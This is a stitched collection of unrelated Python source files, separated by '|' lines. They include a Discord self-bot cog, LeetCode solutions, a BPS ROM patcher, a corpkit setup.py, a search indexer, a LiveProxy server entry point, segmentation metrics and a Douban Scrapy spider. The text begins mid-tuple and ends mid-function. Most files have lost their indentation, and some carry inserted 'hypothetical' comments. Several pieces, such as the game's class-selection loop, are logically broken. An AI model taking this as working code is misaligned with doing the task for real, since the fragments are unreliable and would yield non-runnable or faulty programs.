(320, '\N{PISCES}'),
(420, '\N{ARIES}'),
(521, '\N{TAURUS}'),
(621, '\N{GEMINI}'),
(722, '\N{CANCER}'),
(823, '\N{LEO}'),
(923, '\N{VIRGO}'),
(1023, '\N{LIBRA}'),
(1122, '\N{SCORPIUS}'),
(1222, '\N{SAGITTARIUS}'),
(1231, '\N{CAPRICORN}'),
)
self.moon_phases = (
(0, '\N{NEW MOON SYMBOL}'),
(4, '\N{WAXING CRESCENT MOON SYMBOL}'),
(7, '\N{FIRST QUARTER MOON SYMBOL}'),
(11, '\N{WAXING GIBBOUS MOON SYMBOL}'),
(14, '\N{FULL MOON SYMBOL}'),
(18, '\N{WANING GIBBOUS MOON SYMBOL}'),
(21, '\N{LAST QUARTER MOON SYMBOL}'),
(26, '\N{WANING CRESCENT MOON SYMBOL}'),
)
def get_zodiac(self, month, day):
date = 100 * month + day
index = bisect.bisect(self.zodiac, (date, ''))
return self.zodiac[index][1]
def get_moon_phase(self, date):
phase = self.astral.moon_phase(date)
index = bisect.bisect(self.moon_phases, (phase, ''))
return self.moon_phases[index][1]
@commands.command()
async def today(self, ctx):
''' Gets some information about today '''
now = datetime.now()
moon_phase = self.get_moon_phase(now)
zodiac_sign = self.get_zodiac(now.month, now.day)
desc = (f'Moon Phase: {moon_phase}\n'
f'Zodiac sign: {zodiac_sign}\n')
embed = discord.Embed(type='rich', description=desc)
embed.set_author(name=f'Today is {now:%A, %B %d, %Y}')
await ctx.send(embed=embed)
@commands.command()
async def uptime(self, ctx):
''' Gets the uptime of this self-bot '''
uptime = str(self.bot.uptime).split('.')[0]
await ctx.message.edit(content=f'`{uptime}`')
@commands.command()
async def unixtime(self, ctx):
''' Gets the current UNIX timestamp '''
await ctx.message.edit(content=f'`{time.time()}`')
|
import json
def openfile(l):  # import data from a JSON file
    with open(l, 'r') as f:
        b = json.loads(f.read())[0]
    x = b["universe_name"]
    y = b['rewards']
    z = b['portals']
    return x, y, z
class Universe(object):
def __init__(self,name=str(),rewards=(),portals=()):
self.name=name
self.rewards=rewards
self.portals=portals
def __str__(self):
return self.name
def countrewards(self):
return len(self.rewards)
def countportals(self):
return len(self.portals)
if __name__ == "__main__":#Test
x,y,z=openfile('file1.txt')
print(Universe(x,y,z),Universe(x,y,z).countrewards(),Universe(x,y,z).countportals())
|
t = int(input())
while t > 0:
n = int(input())
s = str(input())
if s[0] == '2' and s[-1] == '0' and s[-2] == '2' and s[-3] == '0':
print("YES")
elif s[0] == '2' and s[1] == '0' and s[2] == '2' and s[-1] == '0':
print("YES")
elif s[0] == '2' and s[1] == '0' and s[2] == '2' and s[3] == '0':
print("YES")
elif s[-1] == '0' and s[-2] == '2' and s[-3] == '0' and s[-4] == '2':
print("YES")
elif s[0] == '2' and s[1] == '0' and s[-1] == '0' and s[-2] == '2':
print("YES")
else:
print("NO")
t = t-1
|
values = {1:1, 2:5, 3:8, 4:9, 5:10, 6:17, 7:17, 8:20, 9:24, 10:30}
previous_values = []
def rod_cut(rod_length):
    previous_values.append(0)
    for length in range(1, rod_length + 1):
        current_max = 0  # best revenue for the current sub-length
for possible_cut in values:
if possible_cut <= length:
current_max = max(current_max, values[possible_cut] +
previous_values[length - possible_cut])
print(previous_values)
previous_values.append(current_max)
print(current_max)
print(previous_values)
rod_cut(4)
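# With the sample price table above, rod_cut(4) should report 10
# (two pieces of length 2) and previous_values == [0, 1, 5, 8, 10].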
|
#
# @lc app=leetcode.cn id=34 lang=python3
#
# [34] Find First and Last Position of Element in Sorted Array
#
# @lc code=start
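from typing import List  # hypothetical addition: needed to run outside the LeetCode judge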
class Solution:
def searchRange(self, nums: List[int], target: int) -> List[int]:
left, right = self.binarySearchLeft(nums, target), self.binarySearchRight(nums, target)
return [left, right] if left <= right else [-1, -1]
def binarySearchLeft(self, nums, target):
left, right = 0, len(nums) - 1
while left <= right:
med = (left + right) // 2
if nums[med] >= target:
right = med - 1
else:
left = med + 1
return left
def binarySearchRight(self, nums, target):
left, right = 0, len(nums) - 1
while left <= right:
med = (left + right) // 2
if nums[med] <= target:
left = med + 1
else:
right = med - 1
return right
# @lc code=end
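# Hypothetical quick check (not part of the original file):
# Solution().searchRange([5, 7, 7, 8, 8, 10], 8) -> [3, 4]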
|
import ha_engine.ha_infra as common
import habase_helper as helper
LOG = common.ha_logging(__name__)
class BaseMonitor(object):
def __init__(self, input_args):
self.ha_report = []
self.input_args = {}
if input_args:
self.set_input_arguments(input_args)
def set_input_arguments(self, input_args):
self.input_args = input_args
LOG.info("Self, input %s " , str(self.input_args))
def get_input_arguments(self):
return self.input_args
def start(self, sync=None, finish_execution=None):
raise NotImplementedError('Subclass should implement this method')
def stop(self):
raise NotImplementedError('Subclass should implement this method')
def report(self):
raise NotImplementedError('Subclass should implement this method')
def stable(self):
raise NotImplementedError('Subclass should implement this method')
def is_module_exeution_completed(self, finish_exection):
raise NotImplementedError('Subclass should implement this method')
|
"""
insertion sort implementaion
"""
def insertion_sort(x):
if len(x) < 2:
return
for i in range(1, len(x)):
for j in range(i, 0, -1):
if x[j] < x[j - 1]:
x[j], x[j - 1] = x[j - 1], x[j]
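# Hypothetical quick check (not part of the original file): sorts the list in place.
if __name__ == "__main__":
    sample = [5, 2, 4, 6, 1, 3]
    insertion_sort(sample)
    print(sample)  # expected: [1, 2, 3, 4, 5, 6]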
|
from .aws import AutoScaling
from .formatter import FormatReport
from .sender import SendReport
def stateless_ha(asg):
return 'StatelessHa' in asg['Tags']
def not_enough_subnets(asg):
return len(asg['VPCZoneIdentifier'].split(',')) < 2
def enough_subnets(asg):
return len(asg['VPCZoneIdentifier'].split(',')) >= 2
def asg_name(asg):
return asg['AutoScalingGroupName']
def asg_subnet_report(sender, region):
autoscaling_groups = list(
filter(stateless_ha, AutoScaling(region).describe_auto_scaling_groups())
)
    report = {
        'Sufficient Subnets': map(
            asg_name, filter(enough_subnets, autoscaling_groups)
        ),
        'Insufficient Subnets': map(
            asg_name, filter(not_enough_subnets, autoscaling_groups)
        ),
    }
SendReport(FormatReport(report).format()).send(sender, region=region)
|
import binascii
import enum
import io
ENDIAN = "little"
class Action(enum.IntEnum):
SourceRead = 0
TargetRead = 1
SourceCopy = 2
TargetCopy = 3
def convert_uint(b: bytes):
return int.from_bytes(b, ENDIAN, signed=False)
def read_number_io(b: io.BytesIO) -> int:
data, shift = 0, 1
# this was basically directly copied from the bps_spec
while(True):
x = b.read(1)
if len(x) == 0:
return None
x = convert_uint(x)
data += (x & 0x7f) * shift
if (x & 0x80):
break
shift <<= 7
data += shift
return data
def read_number(b: bytes) -> tuple:
""" Read a number that starts at the beginning of the bytes
returns a tuple of the number read and remaining bytes
"""
bio = io.BytesIO(b)
data = read_number_io(bio)
return data, bio.read()
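# Hypothetical example (not part of the original file):
# read_number(b"\x83\x01") decodes the variable-length integer 3 and
# returns b"\x01" as the unread remainder.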
class InvalidPatch(Exception):
def __init__(self, msg):
self.msg = msg
class BPSPatch(object):
MAGIC_HEADER = "BPS1".encode("UTF-8")
def __init__(self, patch: bytes):
header = patch[:4]
if header != self.MAGIC_HEADER:
raise InvalidPatch(f"Magic header {header} is incorrect")
self.source_checksum = convert_uint(patch[-4*3:-4*2])
self.target_checksum = convert_uint(patch[-4*2:-4*1])
self.patch_checksum = convert_uint(patch[-4*1:])
calculated_checksum = binascii.crc32(patch[:-4])
if self.patch_checksum != calculated_checksum:
raise InvalidPatch(
f"Patch Checksum {self.patch_checksum} does not match "
f"actual checksum {calculated_checksum}"
)
remainder = patch[4:]
self.source_size, remainder = read_number(remainder)
self.target_size, remainder = read_number(remainder)
self.metadata_size, remainder = read_number(remainder)
self.metadata = remainder[:self.metadata_size].decode("UTF-8")
# actions is everything else other than the header and footer
self.actions = remainder[self.metadata_size:-12]
def patch_rom(self, source: bytes) -> bytes:
if len(source) != self.source_size:
raise InvalidPatch(
f"source size {len(source)} does not match "
f"expected {self.source_size}")
source_checksum = binascii.crc32(source)
if source_checksum != self.source_checksum:
raise InvalidPatch(
f"source checksum {source_checksum} does not match "
f"expected {self.source_checksum}")
target = bytearray(self.target_size)
actions = io.BytesIO(self.actions)
output_offset = 0
source_relative_offset = 0
target_relative_offset = 0
while(True):
action = read_number_io(actions)
if action is None:
break
command = action & 3
length = (action >> 2) + 1
print(f"Command {command}, length {length}")
if command == Action.SourceRead:
# consume some number of bytes from source file
target[output_offset:output_offset + length] = \
source[output_offset:output_offset + length]
output_offset += length
elif command == Action.TargetRead:
# consume some number of bytes from patch file
target[output_offset:output_offset + length] = \
actions.read(length)
output_offset += length
elif command == Action.SourceCopy:
# consume some number of bytes from source file, but from
# somewhere else. This action seems unnecessarily complicated
data = read_number_io(actions)
source_relative_offset += (-1 if data & 1 else 1) * (data >> 1)
target[output_offset:output_offset + length] = \
source[
source_relative_offset:source_relative_offset + length]
output_offset += length
source_relative_offset += length
elif command == Action.TargetCopy:
# consume some number of bytes from the target file
data = read_number_io(actions)
target_relative_offset += (-1 if data & 1 else 1) * (data >> 1)
# unfortunately it is not safe to optimize this, as one of the
# documented use cases is to write a single byte then duplicate
# that byte over and over filling out an array.
for _ in range(length):
target[output_offset] = target[target_relative_offset]
output_offset += 1
target_relative_offset += 1
target_checksum = binascii.crc32(target)
if target_checksum != self.target_checksum:
raise InvalidPatch(
f"target checksum {target_checksum} does not match "
f"expected {self.target_checksum}")
return target
def main():
with open("/home/mgius/base_patch.bps", "rb") as f:
base_patch = f.read()
with open("/home/mgius/src/retropie-alttpr/ZeldaBase.sfc", "rb") as f:
source = f.read()
patcher = BPSPatch(base_patch)
base_patched = patcher.patch_rom(source)
with open("/home/mgius/src/retropie-alttpr/ZeldaPatched.sfc", "wb") as f:
f.write(base_patched)
if __name__ == '__main__':
main()
|
import random
import math
Menu = True
gameStart = False
instructionStart = False
aboutStart = False
global selection
""" This is the "about" page; essentially a credits page """
def About():
leaveAbout = False
while leaveAbout == False:
print('u uglee')
leaveAbout = input('type anything to leave lmao :')
if leaveAbout == 'yes':
leaveAbout = True
""" This function asks for the player's class."""
def charClass(selection):
character = "nothing"
while selection == "nothing":
if selection == 'knight':
print('The knight has great defense and average attack. They lack critical chance and dodge, but are very versatile because they can switch swords during battle.')
confirmation1 = input('Would you like to select this class?')
if confirmation1 == "yes":
Zone = 1
character = 'knight'
break
else:
selection = "nothing"
elif selection == 'assassin':
            print('The assassin has high potential for dps and has a great amount of dodge, but requires a lot of luck and mana management. Their special abilities are poisons.')
confirmation2 = input('Would you like to select this class?')
if confirmation2 == "yes":
Zone = 1
character = 'assassin'
break
else:
selection = "nothing"
elif selection == 'brawler':
            print('The brawler specializes in martial arts, they are the jack-of-all-trades and are cost efficient since they can fight without weapons.')
confirmation1 = input('Would you like to select this class?')
if confirmation1 == "yes":
Zone = 1
character = "brawler"
break
else:
selection = "nothing"
elif selection == 'mage':
            print('The mage has good burst damage and utility but lacks defensive capabilities and requires mana management. Their special abilities are a set of high damage abilities.')
confirmation1 = input('Would you like to select this class?')
if confirmation1 == "yes":
Zone = 1
character = 'mage'
break
else:
selection = "nothing"
elif selection == 'necromancer':
            print('The necromancer has low dps and burst but has great defensive capabilities. They rely on minions for main damage and use health as a resource.')
confirmation1 = input('Would you like to select this class?')
if confirmation1 == "yes":
Zone = 1
character = "necromancer"
break
else:
selection = "nothing"
        else:
            print('That is not an available class')
            selection = input('Choose a class [knight, assassin, brawler, mage, necromancer]: ').lower()
def Game():
zone = 0
health = 0
mana = 0
dodge = 0
armor = 0
crit = 0
gold = 500
selection = 'nothing'
    selection = input("Select your character's role [Knight, Assassin, Brawler, Mage, Necromancer]: ").lower()
    charClass(selection)
print(selection)
while Menu == True:
print('This is the endless Labyrinth')
print('Type \"start\" to start the game')
print('Type \"instructions\" if this is your first time playing')
print('Type in \"about\" to learn about the development of the game')
interfaceInput = input(":")
if interfaceInput == 'start':
gameStart = True
Menu = False
elif interfaceInput == 'instructions':
instructionStart = True
elif interfaceInput == 'about':
aboutStart = True
else:
print('Not a valid response.')
continue
if gameStart == True:
Game()
elif instructionStart == True:
Instructions()
elif aboutStart == True:
About()
|
import setuptools
from setuptools import setup, find_packages
from setuptools.command.install import install
import os
from os.path import isfile, isdir, join, dirname
class CustomInstallCommand(install):
"""Customized setuptools install command."""
def run(self):
from setuptools.command.install import install
install.run(self)
# since nltk may have just been installed
# we need to update our PYTHONPATH
import site
try:
reload(site)
except NameError:
pass
# Now we can import nltk
import nltk
path_to_nltk_f = nltk.__file__
nltkpath = dirname(path_to_nltk_f)
punktpath = join(nltkpath, 'tokenizers')
wordnetpath = join(nltkpath, 'corpora')
if not isfile(join(punktpath, 'punkt.zip')) \
and not isdir(join(punktpath, 'punkt')):
nltk.download('punkt', download_dir=nltkpath)
if not isfile(join(wordnetpath, 'wordnet.zip')) \
and not isdir(join(wordnetpath, 'wordnet')):
nltk.download('wordnet', download_dir=nltkpath)
nltk.data.path.append(nltkpath)
setup(name='corpkit',
version='2.2.7',
description='A toolkit for working with linguistic corpora',
url='http://github.com/interrogator/corpkit',
author='Daniel McDonald',
packages=['corpkit'],
scripts=['corpkit/new_project'],
package_dir={'corpkit': 'corpkit'},
package_data={'corpkit': ['*.jar', 'corpkit/*.jar', '*.sh', 'corpkit/*.sh',
'*.ipynb', 'corpkit/*.ipynb', '*.p', 'dictionaries/*.p',
'*.py', 'dictionaries/*.py']},
author_email='mcdonaldd@unimelb.edu.au',
license='MIT',
cmdclass={'install': CustomInstallCommand,},
keywords=['corpus', 'linguistics', 'nlp'],
install_requires=["matplotlib>=1.4.3",
"nltk>=3.0.0",
"joblib",
"pandas>=0.16.1",
"mpld3>=0.2",
"lxml>=3.4.4",
"requests",
"chardet",
"blessings>=1.6",
"traitlets>=4.1.0"],
dependency_links=['git+https://www.github.com/interrogator/corenlp-xml-lib#egg=corenlp-xml-lib',
'git+https://github.com/interrogator/tkintertable.git@e983dea6565d583439cbe04034774944388213ae#egg=tkintertable'])
|
# Deduplicate with a set
# For each element n, check whether the array contains n + k or n - k
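from typing import List  # hypothetical addition: needed to run outside the LeetCode judge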
class Solution:
def findPairs(self, nums: List[int], k: int) -> int:
visited, res = set(), set()
for num in nums:
if num - k in visited:
res.add(num - k)
if num + k in visited:
res.add(num)
visited.add(num)
return len(res)
|
import json
import os
import secrets
from functools import lru_cache
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
DATA_DIR = os.path.join(BASE_DIR, 'data')
TEMPLATES = os.listdir(os.path.join(BASE_DIR, 'html'))
@lru_cache(maxsize=10)
def autodiscover():
"""
Autodiscover files in the HTML folder of the application
"""
def wrapper(filename=None):
if filename is not None:
if filename in TEMPLATES:
_file = TEMPLATES[TEMPLATES.index(filename)]
return os.path.join(BASE_DIR, 'html', _file)
raise FileNotFoundError(
f'The file you are looking for does not exist. {", ".join(TEMPLATES)}')
return wrapper
def get_data_file(name):
data_path = os.path.join(BASE_DIR, 'data')
return os.path.join(data_path, name)
def write_new_file(values, update_for, filename=None):
"""
Quickly write values to a file
Parameters
values (list): list of values to write
update_for (str): the name of the file from which the data was updated
    filename (str, optional): file name. Defaults to secrets.token_hex(5).
Returns
bool: True or False
"""
    if filename is None:
        # generate the token at call time (a default argument would only be evaluated once)
        filename = secrets.token_hex(5)
    file_name = f'{filename}_updated_from_{update_for}.json'
file_path = os.path.join(DATA_DIR, file_name)
with open(file_path, 'w') as f:
json.dump(values, f, indent=4)
return True
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from pylib.timer import *
from pylib.utils import *
|
class Student:
def __init__(self, name): #constructor
self.name = name
self.subscores = []
def average(self):
return sum(self.subscores)/len(self.subscores)
stu_1 = Student("Lehan")
stu_1.subscores.extend([45,55,79])
print(f"{stu_1.average():.2f}")
|
import os
import pymongo
from tqdm import tqdm
from collections import OrderedDict
from src.tokenizer import Tokenizer
from src.indexer import read_directory
from src.parser import parse
import config
import pprint
import json
Index = dict()
Header = dict()
pp = pprint.PrettyPrinter()
def build_index():
global Index, Header
tokenizer = Tokenizer()
for subdir in os.listdir(config.RAW_WEBPAGES):
full_subdir = os.path.join(config.RAW_WEBPAGES, subdir)
if os.path.isdir(full_subdir):
to_parse = read_directory(full_subdir)
print("Subdirectory: ", subdir)
for _file in tqdm(to_parse):
filename = "/".join(_file.split("/")[1:])
header, txt = parse(_file)
Header[filename] = header
token_counter = tokenizer.counter_tokenize(txt)
for tok in token_counter:
if tok not in Index:
Index[tok] = { filename : token_counter[tok]}
else:
Index[tok][filename] = token_counter[tok]
save_index()
save_header()
def save_header():
with open(config.HEADER_PATH, 'w') as f:
json.dump(Header, f, sort_keys=True, indent=4)
print("[Saved Header succesfully on {}]".format(config.HEADER_PATH))
def save_index():
with open(config.INDEX_PATH, 'w') as f:
json.dump(Index, f, sort_keys=True, indent=4)
print("[Saved Index succesfully on {}]".format(config.INDEX_PATH))
def main():
# client = pymongo.MongoClient('mongodb://localhost:27017/')
# client.drop_database("ICSdatabase")
# db = client['ICSdatabase']
build_index()
# pp.pprint(Index)
if __name__ == '__main__':
main()
|
from typing import Any
from tqdm.auto import tqdm
from parseridge.parser.training.callbacks.base_callback import Callback
class ProgressBarCallback(Callback):
"""
Shows a progress bar during training.
"""
def __init__(self, moving_average: int = 64):
self._pbar = None
self.template = "[{epoch:02d}/{epochs:02d}] | Batch Loss: {loss:8.4f}"
self.prev_loss = []
self.moving_average = moving_average
self.batch_size = None
self.num_epochs = None
self.current_epoch = None
def on_train_begin(self, epochs: int, batch_size: int, **kwargs: Any) -> None:
self.batch_size = batch_size
self.num_epochs = epochs
def on_epoch_begin(
self, epoch: int, num_batches: int, training_data: Any, **kwargs: Any
) -> None:
self.current_epoch = epoch
self._pbar = tqdm(total=len(training_data), leave=True)
self._pbar.set_description(
self.template.format(epoch=self.current_epoch, epochs=self.num_epochs, loss=0)
)
def on_epoch_end(self, epoch_loss: float, **kwargs: Any) -> None:
self._pbar.set_description(
"[{epoch:02d}/{epochs:02d}] | Epoch Loss: {loss:8.4f}".format(
epoch=self.current_epoch, epochs=self.num_epochs, loss=epoch_loss
)
)
self._pbar.close()
def on_batch_end(self, batch_loss: float, batch_data: Any, **kwargs: Any) -> None:
if batch_loss is not None:
self.prev_loss.append(batch_loss)
avg_loss = sum(self.prev_loss) / len(self.prev_loss)
self.prev_loss = self.prev_loss[-self.moving_average :]
else:
if self.prev_loss:
avg_loss = sum(self.prev_loss) / len(self.prev_loss)
else:
avg_loss = 0
self._pbar.set_description(
self.template.format(
epoch=self.current_epoch, epochs=self.num_epochs, loss=avg_loss
)
)
batch_length = len(batch_data[0])
self._pbar.update(batch_length)
|
class Queue(object):
    def __init__(self):
        self.queue = []
    def isEmpty(self):
        return self.queue == []
    def enqueue(self, data):
        # new items go to the front of the list...
        self.queue.insert(0, data)
    def dequeue(self):
        # ...and leave from the back, giving FIFO order
        return self.queue.pop()
    def size(self):
        return len(self.queue)
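if __name__ == "__main__":
    # Hypothetical quick check (not part of the original file): FIFO order
    q = Queue()
    q.enqueue("a")
    q.enqueue("b")
    print(q.dequeue())  # expected: a
    print(q.size())     # expected: 1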
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import base64
import codecs
import errno
import logging
import os
import platform
import sys
from liveproxy import __version__ as liveproxy_version
from requests import __version__ as requests_version
from streamlink import __version__ as streamlink_version
from .argparser import parser
from .constants import FILE_OUTPUT_LIST
from .shared import (
check_root,
setup_logging,
)
from .server import (
HTTPRequest,
ThreadedHTTPServer,
)
log = logging.getLogger('streamlink.liveproxy-main')
def log_current_versions():
'''Show current installed versions'''
# MAC OS X
if sys.platform == 'darwin':
os_version = 'macOS {0}'.format(platform.mac_ver()[0])
# Windows
elif sys.platform.startswith('win'):
os_version = '{0} {1}'.format(platform.system(), platform.release())
# linux / other
else:
os_version = platform.platform()
log.info('For LiveProxy support visit https://github.com/back-to/liveproxy')
log.debug('OS: {0}'.format(os_version))
log.debug('Python: {0}'.format(platform.python_version()))
log.debug('LiveProxy: {0}'.format(liveproxy_version))
log.debug('Streamlink: {0}'.format(streamlink_version))
log.debug('Requests: {0}'.format(requests_version))
def main():
error_code = 0
args = parser.parse_args(sys.argv[1:])
setup_logging()
check_root()
log_current_versions()
HOST = args.host
PORT = int(args.port)
if args.help:
parser.print_help()
elif args.file:
if not os.path.isfile(args.file):
log.error('File does not exist: {0}'.format(args.file))
return
        elif not os.access(args.file, os.R_OK):
log.error('Can\'t read file: {0}'.format(args.file))
return
if args.format == 'm3u':
URL_TEMPLATE = 'http://{host}:{port}/base64/{base64}/'
# %3a
elif args.format == 'e2':
URL_TEMPLATE = 'http%3a//{host}%3a{port}/base64/{base64}/'
else:
return
new_lines = []
log.info('open old file: {0}'.format(args.file))
with codecs.open(args.file, 'r', 'utf-8') as temp:
text = temp.read()
for line in text.splitlines():
if line.startswith('streamlink'):
line = URL_TEMPLATE.format(
host=HOST,
port=PORT,
base64=base64.b64encode(line.encode('utf-8')).decode('utf-8'),
)
new_lines.append(line)
if args.file_output:
new_file = args.file_output
else:
new_file = args.file + '.new'
if args.file == new_file:
log.warning('Don\'t use the same name for the old and the new file.')
return
if not new_file.endswith(tuple(FILE_OUTPUT_LIST)):
log.error('Invalid file type: {0}'.format(new_file))
return
log.info('open new file: {0}'.format(new_file))
with codecs.open(new_file, 'w', 'utf-8') as new_temp:
for line in new_lines:
new_temp.write(line + '\n')
log.info('Done.')
else:
log.info('Starting server: {0} on port {1}'.format(HOST, PORT))
try:
httpd = ThreadedHTTPServer((HOST, PORT), HTTPRequest)
except OSError as err:
if err.errno == errno.EADDRINUSE:
log.error('Could not listen on port {0}! Exiting...'.format(PORT))
sys.exit(errno.EADDRINUSE)
log.error('Error {0}! Exiting...'.format(err.errno))
sys.exit(err.errno)
try:
httpd.serve_forever()
except KeyboardInterrupt:
# close server
if httpd:
httpd.shutdown()
httpd.server_close()
log.error('Interrupted! Exiting...')
error_code = 130
finally:
if httpd:
try:
log.info('Closing server {0} on port {1} ...'.format(HOST, PORT))
httpd.shutdown()
httpd.server_close()
except KeyboardInterrupt:
error_code = 130
sys.exit(error_code)
|
#Enter 2 numbers, to show result with and without decimal places.
a = int(raw_input())
b = int(raw_input())
print (a/b)
print float (a)/b
#Examples of operators.
#Source https://www.programiz.com/python-programming/operators
x = 15
y = 4
# Output: x + y = 19
print('x + y =',x+y)
# Output: x - y = 11
print('x - y =',x-y)
# Output: x * y = 60
print('x * y =',x*y)
# Output: x / y = 3.75
print ('x / y =', float(x)/y)
# Output: x // y = 3
print ('x // y =',x//y)
# Output: x ** y = 50625. 15 to power of 4
print('x ** y =',x**y)
|
import numpy as np
import scipy.io
import scipy.spatial.distance  # needed for the Dice coefficient below
from numpy import genfromtxt
import os
import cv2
from sklearn import metrics
########################################### Vertebra segmentation results
IMG_SIZE_X = 128
IMG_SIZE_Y = 256
# function to generate datasets with segmentation maps of entire spinal column
def create_roi_datasets(roi_dir, fn_dir, IMG_SIZE_X, IMG_SIZE_Y):
# extract filenames and landmark data into arrays
fn_data = genfromtxt(fn_dir, delimiter=',', dtype=str)
roi_data = []
# extract ROIs in order of filenames - same order as landmarks
for filename in fn_data:
for roi in os.listdir(roi_dir):
if roi == filename:
roi_array = cv2.imread(os.path.join(roi_dir, roi), cv2.IMREAD_GRAYSCALE)
new_array = cv2.resize(roi_array, (IMG_SIZE_X, IMG_SIZE_Y))
roi_data.append([new_array])
# save images in array and binarize
roi_data = np.array(roi_data).reshape(-1, IMG_SIZE_Y, IMG_SIZE_X, 1)
roi_data[roi_data < 0.5] = 0
roi_data[roi_data >= 0.5] = 1
roi_data = roi_data.astype(float)
roi_data = np.squeeze(roi_data)
return roi_data
gt_roi_dir = "../data/PredictionsVsGroundTruth/SpineMasks_GroundTruthEndplates"
pred_roi_dir = "../data/PredictionsVsGroundTruth/SpineMasks"
pred_processed_roi_dir = "../data/PredictionsVsGroundTruth/SpineMasks_Processed"
fn_dir = "../data/boostnet_labeldata/labels/test/filenames.csv"
gt_masks = create_roi_datasets(gt_roi_dir, fn_dir, IMG_SIZE_X, IMG_SIZE_Y)
pred_masks = create_roi_datasets(pred_roi_dir, fn_dir, IMG_SIZE_X, IMG_SIZE_Y)
pred_proc_masks = create_roi_datasets(pred_processed_roi_dir, fn_dir, IMG_SIZE_X, IMG_SIZE_Y)
pred_mask_acc = metrics.accuracy_score(gt_masks.reshape(-1), pred_masks.reshape(-1))
pred_proc_masks_acc = metrics.accuracy_score(gt_masks.reshape(-1), pred_proc_masks.reshape(-1))
pred_mask_bal_acc = metrics.balanced_accuracy_score(gt_masks.reshape(-1), pred_masks.reshape(-1))
pred_proc_masks_bal_acc = metrics.balanced_accuracy_score(gt_masks.reshape(-1), pred_proc_masks.reshape(-1))
pred_mask_dice = 1 - scipy.spatial.distance.dice(gt_masks.reshape(-1), pred_masks.reshape(-1))
pred_proc_masks_dice = 1 - scipy.spatial.distance.dice(gt_masks.reshape(-1), pred_proc_masks.reshape(-1))
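# Hypothetical summary printout (not in the original script) so the computed metrics are visible
print("Accuracy:          raw {:.4f} | processed {:.4f}".format(pred_mask_acc, pred_proc_masks_acc))
print("Balanced accuracy: raw {:.4f} | processed {:.4f}".format(pred_mask_bal_acc, pred_proc_masks_bal_acc))
print("Dice:              raw {:.4f} | processed {:.4f}".format(pred_mask_dice, pred_proc_masks_dice))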
|
#-*- coding: UTF-8 -*-
# import scrapy
#
#
# class QuotesSpider(scrapy.Spider):
# name = "bookLink_test"
#
# def start_requests(self):
# urls = [
# 'https://book.douban.com/tag/?view=type&icn=index-sorttags-hot#%E6%96%87%E5%AD%A6',
# ]
# for url in urls:
# yield scrapy.Request(url=url, callback=self.parse)
#
# def parse(self, response):
# filename = 'tagLink.html'
# with open(filename, 'wb') as f:
# f.write(response.body)
# self.log('Saved file %s' % filename)
# import scrapy
# import sys
#
#
#
# class doubanSpider(scrapy.Spider):
# name = 'tagLink'
# start_urls = ['https://book.douban.com/tag/?view=type&icn=index-sorttags-hot#%E6%96%87%E5%AD%A6']
#
# def parse(self, response):
# reload(sys)
# sys.setdefaultencoding('utf-8')
# lista = response.css('table.tagCol a::attr(href)')
# print('list' + str(lista))
# with open('link.txt', 'w') as f:
# for href in response.css('table.tagCol a::attr(href)').extract():
# f.write('https://book.douban.com' + str(href) + '\n')
# # f.write(response.css('table.tagCol a::attr(href)'))
# import scrapy
# import sys
#
#
# class doubanSpider(scrapy.Spider):
# name = 'tagLink'
# start_urls = ['https://book.douban.com/tag/?view=type&icn=index-sorttags-hot#%E6%96%87%E5%AD%A6']
#
# def parse(self, response):
# reload(sys)
# sys.setdefaultencoding('utf-8')
# for href in response.css('table.tagCol a::attr(href)').extract():
# book_list = response.urljoin(href)
# yield scrapy.Request(book_list, self.parse)
# print(type(href))
#
# def parse_bookList(self,response):
# reload(sys)
# sys.setdefaultencoding('utf-8')
# with open('bookname.txt', 'w') as f:
# for info in response.css('div.info'):
# yield {
# 'bookname': info.css('a::title')
# }
# f.write(info.css('a::title')+'\n')
# import scrapy
# import sys
#
#
# class doubanSpider(scrapy.Spider):
# name = 'tagLink'
# start_urls = [
# 'https://book.douban.com/tag/%E5%B0%8F%E8%AF%B4'
# ]
# def parse(self, response):
# reload(sys)
# sys.setdefaultencoding('utf-8')
# with open('bookname.txt', 'w') as f:
# for info in response.css('div.info'):
# for i in info.css('h2 a::text').extract():
# f.write(str(i).strip().replace('\n', '')+'\n')
# import scrapy
# import sys
# from myscrapy.items import MyscrapyItem,bookLink,book
# class doubanSpider(scrapy.Spider):
# name = 'tagLink'
# start_urls = [
# 'https://book.douban.com/tag/%E5%B0%8F%E8%AF%B4'
# ]
# def parse(self, response):
# reload(sys)
# sys.setdefaultencoding('utf-8')
# bookListItem = bookLink()
# book_list = response.css('ul.subject-list')
# with open('bookLink.txt', 'w') as f:
# for item in book_list.css('li.subject-item'):
# book_name = item.css('h2 a::text').extract().strip()
# book_link = item.css().extract('h2 a::attr(href)').extract().strip()
# bookListItem['book_name'] = book_name
# bookListItem['book_link'] = book_link
# book_list = response.urljoin(book_link)
# yield scrapy.Request(book_list, self.book_parse)
# f.write(bookListItem.book_name + '\t' + bookListItem.book_link)
# next_page = response.css('span.next a::attr(href)').extract().strip()
# if next_page is not None:
# next_page = response.urljoin(next_page)
# yield scrapy.Request(next_page, callback=self.parse)
# def book_parse(self, response):
# reload(sys)
# sys.setdefaultencoding('utf-8')
# bookItem = book()
# bookItem['book_name'] = response.css('h1 span::text').extract().strip()
# bookItem['ave_rate'] = response.css('').extract().strip()
# bookItem['comment_num'] = response.css('').extract().strip()
# bookItem['rate5'] = response.css('').extract().strip()
# bookItem['rate4'] = response.css('').extract().strip()
# bookItem['rate3'] = response.css('').extract().strip()
# bookItem['rate2'] = response.css('').extract().strip()
# bookItem['rate1'] = response.css('').extract().strip()
# bookItem['author'] = response.css('').extract().strip()
# bookItem['original_name'] = response.css('').extract().strip()
# bookItem['translator'] = response.css('').extract().strip()
# bookItem['public_year'] = response.css('').extract().strip()
# bookItem['rate5'] = response.css('').extract().strip()
# bookItem['rate5'] = response.css('').extract().strip()
# bookItem['rate5'] = response.css('').extract().strip()
# bookItem['rate5'] = response.css('').extract().strip()
# bookItem['rate5'] = response.css('').extract().strip()
import scrapy
import sys
from myscrapy.items import MyscrapyItem,bookLink,book
class doubanSpider(scrapy.Spider):
name = 'tagLink'
# start_urls = [
# 'https://book.douban.com/tag/%E5%B0%8F%E8%AF%B4'
# ]
start_urls = [
'https://book.douban.com/tag/?view=type&icn=index-sorttags-hot'
]
def parse(self, response):
reload(sys)
sys.setdefaultencoding('utf-8')
for href in response.css('table.tagCol a::attr(href)').extract():
tag_list = response.urljoin(href)
yield scrapy.Request(tag_list, self.book_list_parse)
# print(type(href))
def book_list_parse(self, response):
reload(sys)
